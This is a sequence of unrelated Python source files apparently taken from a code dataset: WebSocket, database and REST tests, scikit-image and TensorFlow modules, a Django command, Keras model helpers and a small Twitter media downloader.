self.testsocket.send(message)
data = repr(self.testsocket.recv(1024))
#print 'Response to invalid message<TestMessage> %s'%(data)
self.assertEqual(data, '\'CONNECTION_REJECTED\'', "Invalid Message rejected")
def test_valid_WS_Request(self):
message = "GET /mychat HTTP/1.1\nHost: server.example.com\nUpgrade: websocket\nConnection: Upgrade\nSec-WebSocket-Key: <KEY>nSec-WebSocket-Protocol: chat\nSec-WebSocket-Version: 13\nOrigin: localhost\n\n"
# message = "Test message"
self.testsocket.sendall(message)
wsresponse = repr(self.testsocket.recv(1024))
#print 'Response to valid ws request %s'%wsresponse
self.assertNotEqual(wsresponse, '\'CONNECTION_REJECTED\'', "Connection is not rejected")
self.assertIsNotNone(wsresponse, "Connection Response is not Empty")
self.testsocket.sendall(("Test Message"))
data = repr(self.testsocket.recv(1024))
#print 'Response to un encoded Request %s'%(data)
self.assertEqual(data, "\'Un expected opcode\'", "In valid Message rejected")
def test_invalid_Messge(self):
message = "GET /mychat HTTP/1.1\nHost: server.example.com\nUpgrade: websocket\nConnection: Upgrade\nSec-WebSocket-Key: <KEY>==\nSec-WebSocket-Protocol: chat\nSec-WebSocket-Version: 13\nOrigin: localhost\n\n"
self.testsocket.sendall(message)
wsresponse = repr(self.testsocket.recv(1024))
sleep(1)
self.testsocket.sendall("Test Message")
data = repr(self.testsocket.recv(1024))
self.assertEqual(data, "\'Un expected opcode\'", "In valid Message rejected")
def test_malformed_Message(self):
message = "GET /mychat HTTP/1.1\nHost: server.example.com\nUpgrade: websocket\nConnection: Upgrade\nSec-WebSocket-Key: <KEY>==\nSec-WebSocket-Protocol: chat\nSec-WebSocket-Version: 13\nOrigin: localhost\n\n"
self.testsocket.sendall(message)
wsresponse = repr(self.testsocket.recv(1024))
# print wsresponse
self.testsocket.send(encodeMessage("Test Message"))#This line seems to get stuck at times. Solution is to use sendAll, use \n at the end
data = repr(self.testsocket.recv(1024))
self.assertEqual(data, "\'MISFORMATED MESSAGE\'", "Messages with out a type is rejected")
def test_wellformed_Message_for_Text(self):
message = "GET /mychat HTTP/1.1\nHost: server.example.com\nUpgrade: websocket\nConnection: Upgrade\nSec-WebSocket-Key: <KEY>nSec-WebSocket-Protocol: chat\nSec-WebSocket-Version: 13\nOrigin: localhost\n\n"
self.testsocket.sendall(message)
wsresponse = repr(self.testsocket.recv(1024))
# print wsresponse
self.testsocket.send(encodeMessage("1<---->Test Message"))#This line seems to get stuck at times. Solution is to use sendAll, use \n at the end
data = repr(self.testsocket.recv(1024))
print data
self.assertEqual(data, "\'Text received\'", "Text Messages is identified and accepted")
def test_wellformed_Message_for_Json(self):
message = "GET /mychat HTTP/1.1\nHost: server.example.com\nUpgrade: websocket\nConnection: Upgrade\nSec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==\nSec-WebSocket-Protocol: chat\nSec-WebSocket-Version: 13\nOrigin: localhost\n\n"
self.testsocket.sendall(message)
wsresponse = repr(self.testsocket.recv(1024))
self.testsocket.send(encodeMessage("2<---->Test Message"))#This line seems to get stuck at times. Solution is to use sendAll, use \n at the end
data = repr(self.testsocket.recv(1024))
# print data
self.assertEqual(data, "\'json is received\'", "json Messages is identified and accepted")
##TO RUN THE FOLLOWING UNIT TESTS IT IS EXPECTED HAVE THE DATABASE
##CREATED. DATABASE SCRIPT IS PROVIDED TO CREATE THE NECESSARY DATABASES AND TABLES
##ASSISCIATED DATA IS NOT PROVIDED.
class TestDatabase(unittest.TestCase):
def setUp(self):
self.connection = es.dbConnect()
def tearDown(self):
self.connection.close()
def test_data_insert_data_Read(self):
self.assertIsInstance(self.connection, MySQLdb.connection, "Database connection accurately set")
jsondata ={"type":"image", "time":"2014.3.4_14.40.30", "ext":"png", "deviceType":"Mobile", "deviceOS":"Badda", "browsertype":"Firefox", "position":{"lon":25.4583105, "lat":65.0600797, "alt":-1000, "acc":48.38800048828125}, "device":{"ax":0, "ay":0, "az":0, "gx":0, "gy":0, "gz":0, "ra":210.5637, "rb":47.5657, "rg":6.9698, "orientation":"potrait"}, "vwidth":480, "vheight":800}
alt = str(jsondata["position"]["alt"]);
if alt=="None":
alt = '0'
heading = '0'
speed = '0'
width = jsondata["vwidth"]
height =jsondata["vheight"]
if width > height :
screenorientation= 1.00#landscape
else :
screenorientation= 0.00#potrait
filename = jsondata["type"]+"_"+jsondata["time"]+"."+jsondata["ext"]
sqlstring1 = "INSERT INTO Imagedata values (\'"+filename+"\',GeomFromText ('POINT("+ str(jsondata["position"]["lat"])+" "+str(jsondata["position"]["lon"])+")'),"+str(jsondata["position"]["alt"])+","+str(jsondata["position"]["acc"])
sqlstring2 =","+str(jsondata["device"]["gx"])+","+str(jsondata["device"]["gy"])+","+str(jsondata["device"]["gz"])
sqlstring3 = ","+str(jsondata["device"]["ra"])+","+str(jsondata["device"]["rb"])+","+str(jsondata["device"]["rg"])+","+str(screenorientation)+",\'"+jsondata["device"]["orientation"]+"\',now(),\'"+str(jsondata["deviceOS"])+"\',\'"+str(jsondata["browsertype"])+"\',\'"+str(jsondata["deviceType"])+"\');"
sqlstring = sqlstring1 + sqlstring2+ sqlstring3
#print(sqlstring)
es.dbInsert(sqlstring)
sqlreadsting = 'select imagename, Browser,devicetype,X(location) as latitude, Y(location) as longitude from Imagedata where time=\'2014.3.4_14.40.31\''
result = es.dbRead(sqlreadsting)
self.assertIsNotNone(result, "Inserted data is retrieved and it is not null")
for row in result:
self.assertEqual(row[0], "image_2014.3.4_14.40.30.png", "Image name is correctly set and saved")
self.assertEqual(row[1], 65.0600797, "Latitudes are saved")
self.assertEqual(row[2], 25.4583105, "Longitude are saved")
HOST = '127.0.0.1' # The remote host
PORT = 17322
class RestServerTestCase(unittest.TestCase):
def setUp(self):
self.db_fd, flaskr.app.config['DATABASE'] = tempfile.mkstemp()
EventService.app.config['TESTING'] = True
self.app = EventService.app.test_client()
flaskr.init_db()
#self.socketServer = self.app.WebSocketServer('',wsport,'127.0.0.1')
def test_rootpath(self):
rv = self.app.get('/')
assert 'This is a REST Service for 2D3DCapture Server.' in rv.data
def test_post_image(self):
rv = self.app.post('/postImage')
assert 'READY' in rv.data
def test_clossing_websocket(self):
rv =self.app.post('/closewebsocketserver')
assert 'CLOSED' or 'ALREADY_CLOSSED' in rv.data
def test_start_websocket(self):
rv =self.app.get('/startwebsocketserver')
# print rv.data
assert 'READY' in rv.data
def test_post_binary_image(self):
rv =self.app.post('/postBinaryImage')
assert 'READY' or '415 Unsupported Media Type' in rv.data
def test_get_All_Image_Data(self):
rv =self.app.get('/getAllImageData')
jsonmsg = json.loads(rv.data)
self.assertIsNotNone(jsonmsg['imageList'] , "getImageData returns a non None list")
def test_get_location_Image_Data(self):
rv =self.app.get('/getLocationImageData?lat=65.0600797&lon=25.4583105')
jsonmsg = json.loads(rv.data)
self.assertIsNotNone(jsonmsg['imageList'] , "getLocationImageData returns a non None list.This is a feature test for location based image data")
def test_closest_Image_retrieval(self):
jsondata1 ={"type":"image", "time":"2014.3.4_14.40.31", "ext":"png", "deviceType":"Mobile", "deviceOS":"Badda", "browsertype":"Firefox", "position":{"lon":25.4583105, "lat":65.0600797, "alt":-1000, "acc":48.38800048828125}, "device":{"ax":0, "ay":0, "az":0, "gx":0, "gy":0, "gz":0, "ra":210.5637, "rb":47.5657, "rg":6.9698, "orientation":"potrait"}, "vwidth":480, "vheight":800}
jsondata2 ={"type":"image", "time":"2014.3.4_14.40.32", "ext":"png", "deviceType":"Mobile", "deviceOS":"Badda", "browsertype":"Firefox", "position":{"lon":25.4582115, "lat":65.0600797, "alt":-1000, "acc":48.38800048828125}, "device":{"ax":0, "ay":0, "az":0, "gx":0, "gy":0, "gz":0, "ra":210.5637, "rb":47.5657, "rg":6.9698, "orientation":"potrait"}, "vwidth":480, "vheight":800}
jsondata3 ={"type":"image", "time":"2014.3.4_14.40.33", "ext":"png", "deviceType":"Mobile", "deviceOS":"Badda", "browsertype":"Firefox", "position":{"lon":25.4584104, "lat":65.0600797, "alt":-1000, "acc":48.38800048828125}, "device":{"ax":0, "ay":0, "az":0, "gx":0, "gy":0, "gz":0, "ra":210.5637, "rb":47.5657, "rg":6.9698, "orientation":"potrait"}, "vwidth":480, "vheight":800}
jsondata4 ={"type":"image", "time":"2014.3.4_14.40.34", "ext":"png", "deviceType":"Mobile", "deviceOS":"Badda", "browsertype":"Firefox", "position":{"lon":25.4586115, "lat":65.0600797, "alt":-1000, "acc":48.38800048828125}, "device":{"ax":0, "ay":0, "az":0, "gx":0, "gy":0, "gz":0, "ra":210.5637, "rb":47.5657, "rg":6.9698, "orientation":"potrait"}, "vwidth":480, "vheight":800}
jsondata5 ={"type":"image", "time":"2014.3.4_14.40.35", "ext":"png", "deviceType":"Mobile", "deviceOS":"Badda", "browsertype":"Firefox", "position":{"lon":25.4587125, "lat":65.0600797, "alt":-1000, "acc":48.38800048828125}, "device":{"ax":0, "ay":0, "az":0, "gx":0, "gy":0, "gz":0, "ra":210.5637, "rb":47.5657, "rg":6.9698, "orientation":"potrait"}, "vwidth":480, "vheight":800}
jsondata6 ={"type":"image", "time":"2014.3.4_14.40.36", "ext":"png", "deviceType":"Mobile", "deviceOS":"Badda", "browsertype":"Firefox", "position":{"lon":25.4588125, "lat":65.0600797, "alt":-1000, "acc":48.38800048828125}, "device":{"ax":0, "ay":0, "az":0, "gx":0, "gy":0, "gz":0, "ra":210.5637, "rb":47.5657, "rg":6.9698, "orientation":"potrait"}, "vwidth":480, "vheight":800}
es.saveData(jsondata1)
es.saveData(jsondata2)
es.saveData(jsondata3)
es.saveData(jsondata4)
es.saveData(jsondata5)
es.saveData(jsondata6)
radius = 0.0001
photoList = es.getClosestImages( 65.0601787, 25.4583107, radius )
self.assertEqual(len(photoList), 4, "Length of the list should be equal of the first test")
for row in photoList:
assert 'image_2014.3.4_14.40.32.png' or 'image_2014.3.4_14.40.31.png' in row[0]
photoList2 = es.getClosestImages( 65.0601787, 25.4587107, radius )
self.assertEqual(len(photoList2), 2, "Length of the list should be equal of the second test")
for row in photoList2:
assert 'image_2014.3.4_14.40.34.png' or 'image_2014.3.4_14.40.35.png' in row[0]
def suite():
testsuit =unittest.TestSuite()
testsuit.addTest(TestWebSockets('test_webSocketServerOBject'))
testsuit.addTest(TestWebSockets('test_valid_WS_Request'))
testsuit.addTest(TestWebSockets('test_invalid_Messge'))
testsuit.addTest(TestWebSockets('test_invalid_Request'))
testsuit.addTest(TestWebSockets('test_malformed_Message'))
testsuit.addTest(TestWebSockets('test_wellformed_Message_for_Text'))
testsuit.addTest(TestWebSockets('test_wellformed_Message_for_Json'))
testsuit.addTest(TestDatabase('test_data_insert_data_Read'))
testsuit.addTest(RestServerTestCase('test_rootpath'))
testsuit.addTest(RestServerTestCase('test_post_image'))
testsuit.addTest(RestServerTestCase('test_start_websocket'))
testsuit.addTest(RestServerTestCase('test_clossing_websocket'))
testsuit.addTest(RestServerTestCase('test_post_binary_image'))
testsuit.addTest(RestServerTestCase('test_get_All_Image_Data'))
testsuit.addTest(RestServerTestCase('test_closest_Image_retrieval'))
return testsuit
suite = suite()
runner = unittest.TextTestRunner(verbosity=3)
runner.run(suite)
# if __name__ == "__main__":
# #import sys;sys.argv = ['', 'Test.testName']
# unittest.main() | 2.125 | 2 |
src/tests/client_side/test_main.py | JulianSobott/OpenDrive | 1 | 4917 | <filename>src/tests/client_side/test_main.py
import os
import threading
import time
import unittest
from OpenDrive.client_side import file_changes_json as c_json
from OpenDrive.client_side import interface
from OpenDrive.client_side import main
from OpenDrive.client_side import paths as client_paths
from OpenDrive.server_side import paths as server_paths
from tests.client_side.helper_client import h_register_dummy_user_device_client
from tests.helper_all import h_client_routine, h_start_server_process, h_stop_server_process, \
h_clear_init_all_folders, h_create_empty
class TestMain(unittest.TestCase):
def setUp(self) -> None:
h_clear_init_all_folders()
self._server_process = h_start_server_process()
self.folder1_abs_local_path = client_paths.normalize_path(client_paths.LOCAL_CLIENT_DATA, "folder1")
h_create_empty(self.folder1_abs_local_path)
main.MIN_UPDATE_PAUSE_TIME = 1
def tearDown(self) -> None:
main.shutdown()
h_stop_server_process(self._server_process)
@h_client_routine(clear_folders=False)
def putest_start_logged_in(self):
user = h_register_dummy_user_device_client()
main_thread = threading.Thread(target=main.start, daemon=True)
main_thread.start()
time.sleep(2) # wait till changes.json is created
interface.add_sync_folder(self.folder1_abs_local_path, "folder1")
expected_content = c_json.get_all_data()
file_path = os.path.join(self.folder1_abs_local_path, "dummy.txt")
with open(file_path, "w") as f:
f.write("Hello World")
time.sleep(5) # wait till synchronization finished
expected_path = os.path.join(server_paths.get_users_root_folder(user.user_id), "folder1/dummy.txt")
self.assertTrue(os.path.exists(expected_path), "dummy file is not pulled to server!")
self.assertEqual(expected_content, c_json.get_all_data())
time.sleep(1) # wait till waiting...
| 2.25 | 2 |
site-packages/skimage/io/tests/test_io.py | oz90210/Pyto | 0 | 4918 | <gh_stars>0
import os
import numpy as np
from skimage import io, data_dir
from skimage._shared import testing
from skimage._shared.testing import assert_array_equal
one_by_one_jpeg = (
b'\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01'
b'\x00\x01\x00\x00\xff\xdb\x00C\x00\x03\x02\x02\x02\x02'
b'\x02\x03\x02\x02\x02\x03\x03\x03\x03\x04\x06\x04\x04'
b'\x04\x04\x04\x08\x06\x06\x05\x06\t\x08\n\n\t\x08\t\t'
b'\n\x0c\x0f\x0c\n\x0b\x0e\x0b\t\t\r\x11\r\x0e\x0f\x10'
b'\x10\x11\x10\n\x0c\x12\x13\x12\x10\x13\x0f\x10\x10'
b'\x10\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11'
b'\x00\xff\xc4\x00\x14\x00\x01\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\xff\xc4\x00'
b'\x14\x10\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\xff\xda\x00\x08\x01\x01\x00'
b'\x00?\x00*\x9f\xff\xd9'
)
def test_stack_basic():
x = np.arange(12).reshape(3, 4)
io.push(x)
assert_array_equal(io.pop(), x)
def test_stack_non_array():
with testing.raises(ValueError):
io.push([[1, 2, 3]])
def test_imread_file_url():
# tweak data path so that file URI works on both unix and windows.
data_path = data_dir.lstrip(os.path.sep)
data_path = data_path.replace(os.path.sep, '/')
image_url = 'file:///{0}/camera.png'.format(data_path)
image = io.imread(image_url)
assert image.shape == (512, 512)
def test_imread_http_url(httpserver):
# httpserver is a fixture provided by pytest-localserver
# https://bitbucket.org/pytest-dev/pytest-localserver/
httpserver.serve_content(one_by_one_jpeg)
# it will serve anything you provide to it on its url.
# we add a /test.jpg so that we can identify the content
# by extension
image = io.imread(httpserver.url + '/test.jpg' + '?' + 's' * 266)
assert image.shape == (1, 1)
| 1.898438 | 2 |
tests/core/feature_extraction/test_galaxyProcessor.py | EmilioCC/gti770-student-framework | 0 | 4919 | <reponame>EmilioCC/gti770-student-framework
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import numpy as np
from unittest import TestCase
from core.feature_extraction.galaxy.galaxy_processor import GalaxyProcessor
from commons.helpers.dataset.strategies.galaxy_dataset.label_strategy import GalaxyDataSetLabelStrategy
from commons.helpers.dataset.context import Context
class TestGalaxyProcessor(TestCase):
def setUp(self):
validation_size = 0.2
# Get the ground truth CSV file from script's parameters.
self.galaxy_csv_file = os.environ["VIRTUAL_ENV"] + "/data/csv/galaxy/galaxy.csv"
self.galaxy_images_path = os.environ["VIRTUAL_ENV"] + "/data/images/"
# Create instance of data set loading strategies.
galaxy_label_data_set_strategy = GalaxyDataSetLabelStrategy()
# Set the context to galaxy label data set loading strategy.
context = Context(galaxy_label_data_set_strategy)
context.set_strategy(galaxy_label_data_set_strategy)
self.label_dataset = context.load_dataset(csv_file=self.galaxy_csv_file, one_hot=False,
validation_size=np.float32(validation_size))
def testGalaxyProcessor(self):
# Process galaxies.
galaxy_processor = GalaxyProcessor(self.galaxy_images_path)
#features = galaxy_processor.process_galaxy(self.label_dataset) | 2.375 | 2 |
country/management/commands/populate_countries.py | okchaty/django-country | 1 | 4920 | from django.conf import settings
from django.core.management import call_command
from django.core.management.base import BaseCommand
from os import path
class Command(BaseCommand):
help = "Populates data"
def handle(self, *args, **options):
fixture_path = path.join(path.dirname(
path.dirname(
path.dirname(
path.abspath(__file__)
)
)
), "fixtures/")
settings.FIXTURE_DIRS = (fixture_path,)
call_command("loaddata", "country", verbosity=1)
| 1.867188 | 2 |
gmso/formats/formats_registry.py | chrisiacovella/gmso | 20 | 4921 | """Registry utilities to handle formats for gmso Topology."""
class UnsupportedFileFormatError(Exception):
"""Exception to be raised whenever the file loading or saving is not supported."""
class Registry:
"""A registry to incorporate a callable with a file extension."""
def __init__(self):
self.handlers = {}
def _assert_can_process(self, extension):
if extension not in self.handlers:
raise UnsupportedFileFormatError(
f"Extension {extension} cannot be processed as no utility "
f"is defined in the current API to handle {extension} files."
)
def get_callable(self, extension):
"""Get the callable associated with extension."""
self._assert_can_process(extension)
return self.handlers[extension]
SaversRegistry = Registry()
LoadersRegistry = Registry()
class saves_as:
"""Decorator to aid saving."""
def __init__(self, *extensions):
extension_set = set(extensions)
self.extensions = extension_set
def __call__(self, method):
"""Register the method as saver for an extension."""
for ext in self.extensions:
SaversRegistry.handlers[ext] = method
return method
class loads_as:
"""Decorator to aid loading."""
def __init__(self, *extensions):
extension_set = set(extensions)
self.extensions = extension_set
def __call__(self, method):
"""Register the method as loader for an extension."""
for ext in self.extensions:
LoadersRegistry.handlers[ext] = method
return method
| 2.578125 | 3 |
formatter.py | Staist/Python-Text-Formatter | 0 | 4922 | dosyaadi = input("Enter file name: ")
dosyaadi = str(dosyaadi + ".txt")
with open(dosyaadi, 'r') as file :
dosyaicerigi = file.read()
silinecek = str(input("Enter the text that you wish to delete: "))
dosyaicerigi = dosyaicerigi.replace(silinecek, '')
with open(dosyaadi, 'w') as file:
file.write(dosyaicerigi)
file.close()
print("-" * 30)
print("Successfully deleted!")
print("-" * 30)
| 3.765625 | 4 |
covid19/classification/helpers.py | salvacarrion/mltests | 0 | 4923 | import tensorflow as tf
@tf.function
def BinaryAccuracy_Infiltrates(y_true, y_pred, i=0):
return tf.keras.metrics.binary_accuracy(y_true[:, i], y_pred[:, i])
@tf.function
def BinaryAccuracy_Pneumonia(y_true, y_pred, i=1):
return tf.keras.metrics.binary_accuracy(y_true[:, i], y_pred[:, i])
@tf.function
def BinaryAccuracy_Covid19(y_true, y_pred, i=2):
return tf.keras.metrics.binary_accuracy(y_true[:, i], y_pred[:, i])
@tf.function
def BinaryAccuracy_Normal(y_true, y_pred, i=3):
return tf.keras.metrics.binary_accuracy(y_true[:, i], y_pred[:, i])
class CustomModelCheckpoint(tf.keras.callbacks.ModelCheckpoint):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.wait_epoch_warmup = kwargs.get("wait_epoch_warmup")
def on_epoch_end(self, epoch, logs=None):
if self.wait_epoch_warmup:
if (epoch + 1) >= self.wait_epoch_warmup:
super().on_epoch_end(epoch, logs)
else:
self.epochs_since_last_save += 1
print(f"Skipping save model (wait_epoch_warmup={self.wait_epoch_warmup - (epoch + 1)})")
else:
super().on_epoch_end(epoch, logs)
class CustomEarlyStopping(tf.keras.callbacks.EarlyStopping):
def __init__(self, *args, **kwargs):
self.minimum_epochs = kwargs.get("minimum_epochs", 0)
kwargs.pop('minimum_epochs', None) # Problems with EarlyStopping kwargs
super().__init__(*args, **kwargs)
def on_epoch_end(self, epoch, logs=None):
if epoch >= self.minimum_epochs:
super().on_epoch_end(epoch, logs)
def get_losses():
losses = [tf.keras.losses.BinaryCrossentropy()]
return losses
def get_metrics(single_output_idx, add_normal=False):
metrics = []
if single_output_idx is None: # Multi-label
print("###### Multi-label classification ######")
metrics += [
BinaryAccuracy_Infiltrates,
BinaryAccuracy_Pneumonia,
BinaryAccuracy_Covid19
]
# Add normal class
if add_normal:
metrics.append(BinaryAccuracy_Normal)
else:
print(f"###### Multi-class classification (cls: '{single_output_idx}') ######")
metrics = [
tf.keras.metrics.BinaryAccuracy(),
tf.keras.metrics.AUC(),
tf.keras.metrics.Precision(),
tf.keras.metrics.Recall()
]
return metrics
def get_model(backbone, classes=None, target_size=None, freeze_base_model=True, ignore_model=None):
istrainable = not freeze_base_model
# Select backbone
if backbone == "resnet50":
from tensorflow.keras.applications.resnet import ResNet50 as TFModel
from tensorflow.keras.applications.resnet import preprocess_input
elif backbone == "resnet50v2":
from tensorflow.keras.applications.resnet_v2 import ResNet50V2 as TFModel
from tensorflow.keras.applications.resnet_v2 import preprocess_input
elif backbone == "resnet101v2":
from tensorflow.keras.applications.resnet_v2 import ResNet101V2 as TFModel
from tensorflow.keras.applications.resnet_v2 import preprocess_input
elif backbone == "vgg16":
from tensorflow.keras.applications.vgg16 import VGG16 as TFModel
from tensorflow.keras.applications.vgg16 import preprocess_input
elif backbone == "efficientnetb0":
from tensorflow.keras.applications.efficientnet import EfficientNetB0 as TFModel
from tensorflow.keras.applications.efficientnet import preprocess_input
elif backbone == "efficientnetb7":
from tensorflow.keras.applications.efficientnet import EfficientNetB7 as TFModel
from tensorflow.keras.applications.efficientnet import preprocess_input
else:
raise ValueError(f"Unknown backbone: {backbone}")
if ignore_model:
model = None
else:
# Instantiate base model with pre-trained weights
base_model = TFModel(input_shape=(*target_size, 3), include_top=False, weights="imagenet")
# Freeze base model
# base_model.trainable = istrainable
for layers in base_model.layers:
layers.trainable = istrainable
# Create a new model on top
inputs = base_model.input
x = base_model(inputs)
# Option A
x = tf.keras.layers.GlobalAveragePooling2D(name='avg_pool')(x)
# Option B
# x = tf.keras.layers.Flatten(name='flatten')(x)
# x = tf.keras.layers.Dense(512, activation='relu', name='fc1')(x)
# x = tf.keras.layers.Dense(512, activation='relu', name='fc2')(x)
# Outputs
outputs = tf.keras.layers.Dense(classes, activation="sigmoid", name='predictions')(x)
model = tf.keras.Model(inputs, outputs)
return model, preprocess_input
def add_tabular_input(model, classes):
# Input1
input1 = model.input
input2 = tf.keras.layers.Input(shape=(2,), name="input_2b")
# Pre-outputs 1x3 + 1x3
output1 = model.output
output2 = tf.keras.layers.Dense(classes, activation="sigmoid", name='output_tab')(input2)
# Outputs
x = tf.keras.layers.Concatenate(axis=1)([output1, output2])
output = tf.keras.layers.Dense(classes, activation="sigmoid", name='final_predictions')(x)
model = tf.keras.Model([input1, input2], output)
return model
def unfreeze_base_model(model, n=None, unfreeze=True):
base_model = model.layers[1].layers
# Select number of layers to unfreeze
idx = 0
if n is not None:
if isinstance(n, int):
idx = n
print(f"Unfreezing {len(base_model) - idx} layers")
elif isinstance(n, float) and 0.0 < n <= 1.0:
idx = int(len(base_model) * n)
print(f"Unfreezing {idx} layers")
else:
raise ValueError("Invalid number of layers")
# We unfreeze all layers but BatchNorm (to not destroy the non-trainable weights)
for layer in base_model[-idx:]:
if not isinstance(layer, tf.keras.layers.BatchNormalization):
layer.trainable = True
| 2.375 | 2 |
null/twitter/twmedia-dl.py | mikoim/funstuff | 0 | 4924 | <reponame>mikoim/funstuff
import re
import json
import time
import sys
import httplib2
from twitter import *
import magic
class TwitterMediaDL:
http = httplib2.Http(".cache")
baseUrl = "https://twitter.com"
consumer_key = ""
consumer_secret = ""
access_token_key = ""
access_token_secret = ""
t = Twitter(auth=OAuth(access_token_key, access_token_secret, consumer_key, consumer_secret))
remaining = None
def http_wrapper(self, uri):
resp, content = self.http.request(
uri=uri, method='GET'
)
return content
def get_medias(self, nickname):
ids = []
for tweet in re.findall("twitter.com/(.+)/status/([0-9]+)",
self.http_wrapper(self.baseUrl + '/%s/media' % nickname).decode()):
ids.append(int(tweet[1]))
max_id = ids[len(ids) - 1]
while 1:
res_raw = self.http_wrapper(
self.baseUrl + '/i/profiles/show/%s/media_timeline?include_available_features=1&include_entities=1&max_id=%d' % (
nickname, max_id)).decode()
try:
res = json.loads(res_raw)
except:
print(res_raw)
time.sleep(5)
res_raw = self.http_wrapper(
self.baseUrl + '/i/profiles/show/%s/media_timeline?include_available_features=1&include_entities=1&max_id=%d' % (
nickname, max_id)).decode()
res = json.loads(res_raw)
if not res['has_more_items']:
break
for tweet in re.findall("twitter.com/(.+)/status/([0-9]+)", res['items_html']):
ids.append(int(tweet[1]))
max_id = int(res['max_id'])
return list(set(ids))
def get_image_url(self, tweet_id):
lst = []
if self.remaining is None or self.remaining % 10 is 0 or self.remaining <= 1:
self.check_limit()
r = self.t.statuses.show(_id=tweet_id, _method='GET')
self.remaining -= 1
print('{:d}\t{:d}\t{:s}'.format(tweet_id, self.get_unix_epoch(r['created_at']), r['text']))
for m in r['entities']['media']:
lst.append(m['media_url'] + ':orig')
return lst
def check_limit(self):
r = self.t.application.rate_limit_status(_method='GET')['resources']['statuses']['/statuses/show/:id']
self.remaining = r['remaining']
print("API Limit : {:d} / {:d} = {:f}".format(r['remaining'], r['limit'], r['remaining'] / r['limit']),
file=sys.stderr)
if r['remaining'] / r['limit'] < 0.10:
reset = r['reset'] - time.time()
print("Please wait... {:f}".format(reset), file=sys.stderr)
time.sleep(reset + 10)
@staticmethod
def get_file_extension(binary):
mime = magic.from_buffer(binary, True).decode()
return mime.split('/')[1]
@staticmethod
def get_unix_epoch(created_at):
return int(time.mktime(time.strptime(created_at, "%a %b %d %H:%M:%S +0000 %Y")))
if __name__ == '__main__':
for i in range(1, len(sys.argv)):
tw = TwitterMediaDL()
for tweetID in tw.get_medias(sys.argv[i]):
list_url = tw.get_image_url(tweetID)
for j in range(0, len(list_url)):
raw = tw.http_wrapper(list_url[j])
ext = tw.get_file_extension(raw)
with open('{:d}_{:d}.{:s}'.format(tweetID, j, ext), 'wb') as f:
f.write(raw)
| 2.75 | 3 |
tensorflow/contrib/metrics/__init__.py | DEVESHTARASIA/tensorflow | 384 | 4925 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Ops for evaluation metrics and summary statistics.
See the @{$python/contrib.metrics} guide.
@@streaming_accuracy
@@streaming_mean
@@streaming_recall
@@streaming_recall_at_thresholds
@@streaming_precision
@@streaming_precision_at_thresholds
@@streaming_auc
@@streaming_curve_points
@@streaming_recall_at_k
@@streaming_mean_absolute_error
@@streaming_mean_iou
@@streaming_mean_relative_error
@@streaming_mean_squared_error
@@streaming_mean_tensor
@@streaming_root_mean_squared_error
@@streaming_covariance
@@streaming_pearson_correlation
@@streaming_mean_cosine_distance
@@streaming_percentage_less
@@streaming_sensitivity_at_specificity
@@streaming_sparse_average_precision_at_k
@@streaming_sparse_average_precision_at_top_k
@@streaming_sparse_precision_at_k
@@streaming_sparse_precision_at_top_k
@@streaming_sparse_recall_at_k
@@streaming_specificity_at_sensitivity
@@streaming_concat
@@streaming_false_negatives
@@streaming_false_negatives_at_thresholds
@@streaming_false_positives
@@streaming_false_positives_at_thresholds
@@streaming_true_negatives
@@streaming_true_negatives_at_thresholds
@@streaming_true_positives
@@streaming_true_positives_at_thresholds
@@auc_using_histogram
@@accuracy
@@aggregate_metrics
@@aggregate_metric_map
@@confusion_matrix
@@set_difference
@@set_intersection
@@set_size
@@set_union
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,line-too-long,g-importing-member,wildcard-import
from tensorflow.contrib.metrics.python.metrics import *
# pylint: enable=wildcard-import
from tensorflow.contrib.metrics.python.ops.confusion_matrix_ops import confusion_matrix
from tensorflow.contrib.metrics.python.ops.histogram_ops import auc_using_histogram
from tensorflow.contrib.metrics.python.ops.metric_ops import aggregate_metric_map
from tensorflow.contrib.metrics.python.ops.metric_ops import aggregate_metrics
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_accuracy
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_auc
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_concat
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_covariance
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_curve_points
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_negatives
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_negatives_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_positives
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_positives_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_absolute_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_cosine_distance
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_iou
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_relative_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_squared_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_tensor
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_pearson_correlation
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_percentage_less
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_precision
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_precision_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall_at_k
